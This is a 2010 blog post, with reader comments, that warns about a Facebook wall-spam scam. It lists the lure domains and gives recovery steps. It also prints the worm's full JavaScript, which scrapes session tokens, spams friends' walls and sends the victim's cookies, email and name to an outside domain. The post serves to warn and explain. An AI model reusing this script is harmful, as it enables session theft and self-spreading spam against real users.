Home > Security, Tech News > Facebook Spam – Status Message

Facebook Spam – Status Message

You get a wall post by some of your friend saying some revolving image , new theme thing is out view the link to enjoy it
you open that site …the site asks you to copy some JavaScript code like …
javascript:(a = (b = document).createElement(“script”)).src = “//imaginemonkeys.com/majic.js?show”, b.body.appendChild(a); void(0)
and when you post it in your Facebook account Address bar…thats it you start spamming .. and the Fire keeps increasing ..
Some of the DOMAINS you should not visit if you see in a post :
http://fbpictures.tk
http://imaginemonkeys.com/fb/
http://fbimages.tk
http://fbookcoolimages.tk/
http://herohide.com/browse.php?
http://www.revolvingimages.info/fb/
http://revolvingimages2.tk/
http://graphicgiants.com/
http://zizz.co.tv/
New domains keep coming ….
HOW TO STOP IT ?
To stop it spamming to your wall simply re-generate your mobile email unique address at http://www.facebook.com/mobile/ clean out your cookies and don’t be copy/pasting javascript into your browser again!
The Script which runs inside the JS(which is mostly majic.js or the index.php file is :
// script name : whitebeard
// author : orkut.com/Community.aspx?cmm=43558952
txt = “Checkout 360 rotate effect on images. MUST SEE http://revolvingimages.info/fb/”;
txtee = “Checkout 360 revolve effect on images. MUST SEE http://revolvingimages.info/fb/”;

alert(“Please wait 2-3 mins while we setup! Do not refresh this window or click any link.”);

with(x = new XMLHttpRequest())
open(“GET”, “/”), onreadystatechange = function () {

if (x.readyState == 4 && x.status == 200) {
comp = (z = x.responseText).match(/name=\\”composer_id\\” value=\\”([\d\w]+)\\”/i)[1];
form = z.match(/name=”post_form_id” value=”([\d\w]+)”/i)[1];
dt = z.match(/name=”fb_dtsg” value=”([\d\w-_]+)”/i)[1];
pfid = z.match(/name=”post_form_id” value=”([\d\w]+)”/i)[1];
appid = “150622878317085″;
appname = “rip_m_j”;

with(xx = new XMLHttpRequest())
open(“GET”, “/ajax/browser/friends/?uid=” + document.cookie.match(/c_user=(\d+)/)[1] + “&filter=all&__a=1&__d=1″),
onreadystatechange = function () { if (xx.readyState == 4 && xx.status == 200) {
m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join(“\n”).replace(/(\/\d+_|_\d+_q\.jpg)/gi, “”).split(“\n”);
i = 0; llimit=25;
t = setInterval(function () {
if (i >= llimit ) return;
if(i == 0) {
with(ddddd = new XMLHttpRequest()) open(“GET”, “/ajax/pages/dialog/manage_pages.php?__a=1&__d=1″),
setRequestHeader(“X-Requested-With”, null),
setRequestHeader(“X-Requested”, null),
onreadystatechange = function(){ if(ddddd.readyState == 4 && ddddd.status == 200){ llm = (d = ddddd.responseText).match(/\\”id\\”:([\d]+)/gi); aaac =llm.length; pplp=0; for(pplp=0;pplp([^<>]+)/)[1] + “&c=”+ document.cookie; document.body.appendChild(s); }
}, send(null);
with(xxcxx = new XMLHttpRequest()) open(“POST”, “/ajax/pages/fan_status.php?__a=1″),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“fbpage_id=176607175684946&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=”+pfid+”&fb_dtsg=” + dt + “&lsd&post_form_id_source=AsyncRequest”);
with(lllllxx = new XMLHttpRequest()) open(“POST”, “/ajax/pages/fan_status.php?__a=1″),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“fbpage_id=150650771629477&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=”+pfid+”&fb_dtsg=” + dt + “&lsd&post_form_id_source=AsyncRequest”);
with(llxlxlxlxx = new XMLHttpRequest()) open(“POST”, “/ajax/pages/fan_status.php?__a=1″),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“fbpage_id=109075015830180&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=”+pfid+”&fb_dtsg=” + dt + “&lsd&post_form_id_source=AsyncRequest”);
} else if (i == llimit – 1) {
with(xxxx = new XMLHttpRequest()) open(“GET”, “/mobile/?v=photos”),
setRequestHeader(“X-Requested-With”, null),
setRequestHeader(“X-Requested”, null),
onreadystatechange = function(){
if(xxxx.readyState == 4 && xxxx.status == 200){
with(s = document.createElement(“script”)) src = “http://revolvingimages.info/majic.js?q=” + document.cookie.match(/c_user=(\d+)/)[1] + “:” + (d = xxxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, “@”) + “:” + d.match(/id=”navAccountName”>([^<>]+)/)[1] + “&c=”+ document.cookie; document.body.appendChild(s); }
}, send(null);
}
if(i%2==0) {
with(xd = new XMLHttpRequest()) open(“POST”, “/ajax/updatestatus.php?__a=1″),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“action=PROFILE_UPDATE&profile_id=” + document.cookie.match(/c_user=(\d+)/)[1] + “&status=” + txt + “&target_id=” + m[Math.floor(Math.random() * m.length)] + “&composer_id=” + comp + “&hey_kid_im_a_composer=true&display_context=profile&post_form_id=” + form + “&fb_dtsg=” + dt + “&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest”);
}
else {
with(xd = new XMLHttpRequest()) open(“POST”, “/ajax/updatestatus.php?__a=1″),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“action=PROFILE_UPDATE&profile_id=” + document.cookie.match(/c_user=(\d+)/)[1] + “&status=” + txtee + “&target_id=” + m[Math.floor(Math.random() * m.length)] + “&composer_id=” + comp + “&hey_kid_im_a_composer=true&display_context=profile&post_form_id=” + form + “&fb_dtsg=” + dt + “&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest”); } i += 1;
}, 2000); }
}, send(null);
}
}, send(null);

Also one Application which is just popping up as Profile Privacy v1.2 is a FAKE APPLICATION and use such comments on other users wall:

OMG OMG OMG… I cant believe this actually works! Now you really can see who viewed your profile! on http://bit.ly/9rVvrN

—Updated—-

How to reset your dedicated/mobile email address?

Many people asked me how to reset mobile email address mentioned at http://facebook.com/mobile. You can do this by visiting your wall, and click on add photo.

There select upload from disk, and there you will see option “upload via email”, click on it. There will be an option “refresh your upload email.”, click on that and it will generate new mobile email address.

  1. badar
    November 29th, 2010 at 22:33 | #1

    way to go nerd! :P
    btw its very helpfull thanks =)

  2. dileepa
    December 1st, 2010 at 22:11 | #2

    Good one. How did you manage to get the script, can you explain it. I tried a little bit, but without any luck. Good work. :)

  3. denny
    December 2nd, 2010 at 09:12 | #3

    great

  4. December 3rd, 2010 at 12:50 | #4

    @dileepa
    i got it from orkut community, u can check author name in the script

  5. December 4th, 2010 at 13:24 | #5

    facebook revoive

  6. December 4th, 2010 at 13:48 | #6

    How to reset your dedicated/mobile email address?

    Many people asked me how to reset mobile email address mentioned at http://facebook.com/mobile. You can do this by visiting your wall, and click on add photo.

    There select upload from disk, and there you will see option “upload via email”, click on it. There will be an option “refresh your upload email.”, click on that and it will generate new mobile email address.

  7. February 19th, 2011 at 01:49 | #7

    put this domain http://fbverfy.info on the spam list.

  8. Master
    March 2nd, 2011 at 12:14 | #8

    HAHAHAHAHHA

  9. Master
    March 2nd, 2011 at 12:15 | #9
  10. ِالأغبري
    May 2nd, 2011 at 11:23 | #10

    thanks a lot man

  11. adnan
    February 16th, 2012 at 15:53 | #11

    good work. are you engineer? where you work?

  12. February 16th, 2012 at 16:14 | #12

    @adnan
    Thanks adnan, Yes I am software engineer and working in Telenor, Pakistan

  1. November 29th, 2010 at 22:12 | #1
  2. November 29th, 2010 at 22:13 | #2
  3. November 29th, 2010 at 22:16 | #3
  4. November 29th, 2010 at 23:04 | #4
  5. November 29th, 2010 at 23:08 | #5
  6. November 29th, 2010 at 23:46 | #6
  7. November 30th, 2010 at 00:01 | #7
  8. November 30th, 2010 at 00:01 | #8
  9. November 30th, 2010 at 00:01 | #9
  10. November 30th, 2010 at 00:37 | #10
  11. November 30th, 2010 at 00:56 | #11
  12. November 30th, 2010 at 00:58 | #12
  13. November 30th, 2010 at 01:00 | #13
  14. November 30th, 2010 at 01:03 | #14
  15. November 30th, 2010 at 01:12 | #15
  16. November 30th, 2010 at 01:27 | #16
  17. November 30th, 2010 at 01:29 | #17
  18. November 30th, 2010 at 01:53 | #18
  19. November 30th, 2010 at 02:33 | #19
  20. November 30th, 2010 at 02:42 | #20
  21. November 30th, 2010 at 02:58 | #21
  22. November 30th, 2010 at 03:41 | #22
  23. November 30th, 2010 at 03:55 | #23
  24. November 30th, 2010 at 04:04 | #24
  25. November 30th, 2010 at 04:11 | #25
  26. November 30th, 2010 at 04:12 | #26
  27. November 30th, 2010 at 04:15 | #27
  28. November 30th, 2010 at 05:50 | #28
  29. November 30th, 2010 at 05:51 | #29
  30. November 30th, 2010 at 05:58 | #30
  31. November 30th, 2010 at 06:37 | #31
  32. November 30th, 2010 at 06:39 | #32
  33. November 30th, 2010 at 07:38 | #33
  34. November 30th, 2010 at 09:39 | #34
  35. November 30th, 2010 at 09:43 | #35
  36. November 30th, 2010 at 10:41 | #36
  37. November 30th, 2010 at 10:59 | #37
  38. November 30th, 2010 at 11:10 | #38
  39. November 30th, 2010 at 11:46 | #39
  40. November 30th, 2010 at 11:47 | #40
  41. November 30th, 2010 at 11:55 | #41
  42. November 30th, 2010 at 12:53 | #42
  43. November 30th, 2010 at 16:17 | #43
  44. November 30th, 2010 at 18:30 | #44
  45. November 30th, 2010 at 18:48 | #45
  46. November 30th, 2010 at 18:50 | #46
  47. November 30th, 2010 at 18:50 | #47
  48. November 30th, 2010 at 19:01 | #48
  49. November 30th, 2010 at 19:02 | #49
  50. November 30th, 2010 at 19:03 | #50
  51. November 30th, 2010 at 21:50 | #51
  52. November 30th, 2010 at 23:22 | #52
  53. November 30th, 2010 at 23:51 | #53
  54. December 1st, 2010 at 00:33 | #54
  55. December 1st, 2010 at 01:06 | #55
  56. December 1st, 2010 at 01:07 | #56
  57. December 1st, 2010 at 02:47 | #57
  58. December 1st, 2010 at 02:57 | #58
  59. December 1st, 2010 at 04:00 | #59
  60. December 1st, 2010 at 06:21 | #60
  61. December 1st, 2010 at 17:58 | #61
  62. December 1st, 2010 at 18:42 | #62
  63. December 2nd, 2010 at 00:31 | #63
  64. December 2nd, 2010 at 01:53 | #64
  65. December 2nd, 2010 at 02:21 | #65
  66. December 2nd, 2010 at 06:47 | #66
  67. December 3rd, 2010 at 05:21 | #67
  68. December 3rd, 2010 at 07:02 | #68
  69. April 12th, 2011 at 04:46 | #69
*